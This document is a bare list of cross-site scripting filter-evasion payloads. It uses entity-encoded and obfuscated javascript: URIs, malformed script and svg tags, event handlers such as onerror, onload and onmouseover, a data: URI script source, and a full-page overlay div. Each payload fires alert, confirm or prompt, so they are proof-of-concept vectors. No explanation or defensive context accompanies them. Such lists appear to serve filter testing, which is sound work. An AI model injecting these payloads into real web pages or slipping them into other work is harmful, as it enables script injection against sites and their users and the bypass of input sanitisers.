	<object data=javascript&colon;\u0061l&#101%72t(1)>

	<script>++1-+?(1)</script>

	<body/onload=<!-->&#10alert(1)>

	<script itworksinallbrowsers>/<script */alert(1)</script

	<img src ?itworksonchrome?\/onerror = alert(1)

	<svg><script>//&NewLine;confirm(1);</script </svg>

	<svg><script onlypossibleinopera:-)> alert(1)

	<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa
	href=j&#97v&#97script:&#97lert(1)>ClickMe

	<script x> alert</script 1=2

	<div/onmouseover='alert(1)'> style="x:">

	<--`<img/src=` onerror=alert(1)> --!>

	<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,ale&#x00000072;t(1)></script>

	<div style="position:absolute;top:0;left:0;width:100%;height:100%"
	onmouseover="prompt(1)" onclick="alert(1)">x</button>

	<form><button formaction=javascript&colon;alert(1)>CLICKME